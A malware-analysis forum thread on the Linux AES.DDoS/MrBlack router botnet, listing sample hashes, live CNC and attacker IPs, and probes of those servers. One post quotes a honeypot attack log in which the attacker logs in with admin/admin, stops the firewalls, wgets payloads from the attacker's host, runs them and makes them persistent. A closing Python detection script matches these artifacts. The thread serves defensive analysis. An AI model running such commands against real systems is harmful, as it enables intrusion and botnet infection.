Linux/AES.DDoS (alias Dofloo, MrBlack)

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Sat Sep 19, 2015 8:16 am

Nice combination of Mr.Black & AES.DDoS in one panel.. :)
Report:

//  Name             Hashes                              MalwareName & Arch
    1. (2O16I1)    = c86fe64d074a7255968504be5aca8102 // mrblack.ddos ARM
    2. (312vt)     = 0005983da39751deb80264b10f7e16b0 // AES.DDoS ARM
    3. (scaqq)     = 60b25f9c03eca8dee74649d2f0ce3cf0 // AES.ddos ARM
// Files:
   2O16I1:   unpacked, ELF 32-bit LSB executable, ARM, EABI4 (SYSV), static, stripped
   312vt:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
   scaqq:     packed, ELF 32-bit LSB executable, ARM, EABI5 (GNU/Linux), static, stripped
cnc: 222.186.34.220 attacker: 60.166.61.110
unixfreaxjp

Fri Sep 25, 2015 10:47 pm

Mr.Black in action :-)) Panic, hang & had to be SIGKILL'ed in the middle of action :lol:
I guess they missed "something" again.. lol - never used/heard of "slackware" in crookland?
https://www.virustotal.com/en/file/db89 ... 443220303/
This sample is the same as the 206*** one in the post above; it was re-attacking yesterday.
unixfreaxjp

Wed Oct 14, 2015 9:49 pm

This is the AES.DDoS router (ARM) version, NOT MrBlack < please note this, although the code routes for both malware are the same.
Attacker/panel: 59.56.110.233:8081
CNC (IP basis) 59.56.110.233 port 48080
CNC is open, PoC:

Thu Oct 15 06:39:21 JST 2015
233.110.56.59.in-addr.arpa [59.56.110.233] 48080 (http) open
Connection to 59.56.110.233 48080 port [tcp/48080] succeeded! 
Sample: https://www.virustotal.com/en/file/d0cc ... 444858548/
unixfreaxjp

Wed Oct 14, 2015 11:21 pm

Mr.Black on MIPS x32/r3000 series arch routers
https://www.virustotal.com/en/file/1396 ... 444864491/

Attacker & panel: 1.93.19.203 (panel port: 6969)
CNC is ip address: 1.93.19.203 : 7878 / AS4808 CNCGROUP China169 Beijing
#MalwareMUSTDie!!
unixfreaxjp

Thu Oct 15, 2015 10:17 pm

Double panel, same payloads at 123.249.29.244 and 115.230.124.153, w/ SSH attacker from 115.230.124.153
CNC is 123.249.29.244:11024

Int Server...
connect to server...
---server 123.249.29.244:11024---
---server 123.249.29.244:11024 (4095605115:4139)---
(UNKNOWN) [123.249.29.244] 11024 (?) open
Connection to 123.249.29.244 11024 port [tcp/*] succeeded!
READAS.MMD-KICKASS-SCUM.ORG TCP ->123.249.29.244:11024 (ESTABLISHED)
https://www.virustotal.com/en/file/e1ea ... 444947243/
unixfreaxjp

Tue Oct 20, 2015 2:16 am

This is AES.DDoSer, for ARM and Intel
https://www.virustotal.com/en/file/5c56 ... 445306739/
https://www.virustotal.com/en/file/58f7 ... 445306725/
attack log:

2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] Remote SSH version: SSH-2.0-libssh2_1.4.3
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] outgoing: aes128-ctr hmac-sha1 none
2015-10-20 10:12:28 sess/ip=2953,58.221.60.138] incoming: aes128-ctr hmac-sha1 none
2015-10-20 10:12:29 sess/ip=2953,58.221.60.138] login attempt [admin/admin] succeeded
2015-10-20 10:12:33 sess/ip=2953,58.221.60.138] SHELL: /etc/init.d/iptables stop
2015-10-20 10:12:37 sess/ip=2953,58.221.60.138] SHELL: service iptables stop
2015-10-20 10:12:41 sess/ip=2953,58.221.60.138] SHELL: SuSEfirewall2 stop
2015-10-20 10:12:45 sess/ip=2953,58.221.60.138] SHELL: reSuSEfirewall2 stop
2015-10-20 10:12:49 sess/ip=2953,58.221.60.138] SHELL: cd /tmp
2015-10-20 10:12:53 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/linux-arm
2015-10-20 10:12:57 sess/ip=2953,58.221.60.138] SHELL: chmod 777 linux-arm
2015-10-20 10:13:02 sess/ip=2953,58.221.60.138] SHELL: ./linux-arm &
2015-10-20 10:13:05 sess/ip=2953,58.221.60.138] SHELL: wget -c http://58.221.60.138:50000/Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: chmod 777 Linux2.6
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: ./Linux2.6 &
2015-10-20 10:13:19 sess/ip=2953,58.221.60.138] SHELL: echo "cd /tmp/">>/etc/rc.local
2015-10-20 10:13:26 sess/ip=2953,58.221.60.138] SHELL: echo "/etc/init.d/iptables stop">>/etc/rc.local
CNC checks: both are on the same IP and ports as the attacker and its panel..

linux-arm: ELF 32-bit LSB executable, ARM, version 1 (GNU/Linux), statically linked, stripped
538c8a700e6299258380b9d7eff4ee31 linux-arm
open temporary file /etc/sede1dRLk
open temporary file /etc/sednbbFbg
read /etc/rc.d/rc.local
read /etc/init.d/boot.local
Connecting to 58.221.60.138 50050 port ..
(UNKNOWN) 58.221.60.138 50050 (?) open
Connection to 58.221.60.138 50050 port succeeded!
TCP MMD-KICKS-AESDDOS->58.221.60.138:50050 (ESTABLISHED)
VERSONEX:MMD-KICKS-AESDDOS|0|0 MHz|XXXMB|XXXMB|Hacker
INFO:0.5%|0.0XX Mbps
INFO:0.6%|0.0XX Mbps
Infection pace is high..
#MalwareMustDie!!
shibumi
Posts: 8
Joined: Tue Oct 14, 2014 1:48 pm
Location: Germany

Fri Dec 04, 2015 7:02 pm

I've attached further Linux/Mrblack samples
unixfreaxjp

Wed Feb 10, 2016 8:08 am

Memo:
AES.DDoS attack switch, latest version (case switch 0x01 to 0x0C)
Typical MO:

/etc/sed[a-zA-Z0-9]{5}
/etc/rc.d/rc.local
/etc/init.d/boot.local
Network:

CNC: 115.231.219.147:48080 (ip base) AS4134 ChinaNet-ZJ Shaoxing
PNL: 222.186.26.121:443 (hacked victim) AS23650 ChinaNet Jiangsu
Note:
Do make a sig from this sample, and your product can detect all of the AES.DDoS variants correctly w/o mixing them up with MrBlack.
Reversing some flood techniques is good for mitigating them, like this.

#MalwareMustDie
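An added example, not code from the post or from any MalwareMustDie tool, that turns the MO above and the VERSONEX check-in shown in the Oct 20 post into host and network checks: the temp-file pattern, boot-script paths and beacon layout are from the thread; the function names and the sandbox directory demo() builds are assumptions. The temp-file regex allows six characters as well as the five given above, because the names quoted in the Oct 20 post (sede1dRLk, sednbbFbg) are six characters long.

```python
import os
import re
import tempfile

# Artifact patterns from the thread: sed-style temp files in /etc and the boot scripts edited
TMPFILE_RE = re.compile(r"^sed[a-zA-Z0-9]{5,6}$")   # post says {5}; observed names have 6
BOOT_SCRIPTS = ["etc/rc.local", "etc/rc.d/rc.local", "etc/init.d/boot.local"]
BOOT_LINE_RE = re.compile(r"(iptables stop|SuSEfirewall2 stop|^\s*cd /tmp/?\s*$|/tmp/\S+\s*&?$)")
# Check-in format seen on the wire: VERSONEX:<host>|<n>|<n> MHz|<mem>MB|<mem>MB|<tag>
BEACON_RE = re.compile(rb"^VERSONEX:[^|]*\|[^|]*\|[^|]* MHz\|[^|]*MB\|[^|]*MB\|[^|\r\n]+$")

def scan_host(root="/"):
    """Return suspicious temp files and boot-script lines under root (root lets tests sandbox)."""
    hits = {"tmpfiles": [], "boot_lines": []}
    etc = os.path.join(root, "etc")
    if os.path.isdir(etc):
        for name in os.listdir(etc):
            if TMPFILE_RE.match(name):
                hits["tmpfiles"].append(os.path.join(etc, name))
    for rel in BOOT_SCRIPTS:
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            continue
        with open(path, errors="replace") as fh:
            for n, line in enumerate(fh, 1):
                if BOOT_LINE_RE.search(line):
                    hits["boot_lines"].append((path, n, line.rstrip()))
    return hits

def is_aesddos_checkin(payload):
    """Network-side signature for the first message a bot sends to its CNC."""
    return BEACON_RE.match(payload.strip()) is not None

def demo():
    """Build a constructed sandbox resembling an infected box and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "etc", "rc.d"))
    open(os.path.join(root, "etc", "sede1dRLk"), "w").close()   # temp-file name from the post
    with open(os.path.join(root, "etc", "rc.d", "rc.local"), "w") as fh:
        fh.write("#!/bin/sh\ncd /tmp/\n/etc/init.d/iptables stop\n")
    return scan_host(root)
```

Run scan_host() with the default root on a live box; demo() only exercises the logic against a throwaway directory.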
unixfreaxjp

Mon Apr 18, 2016 11:23 am
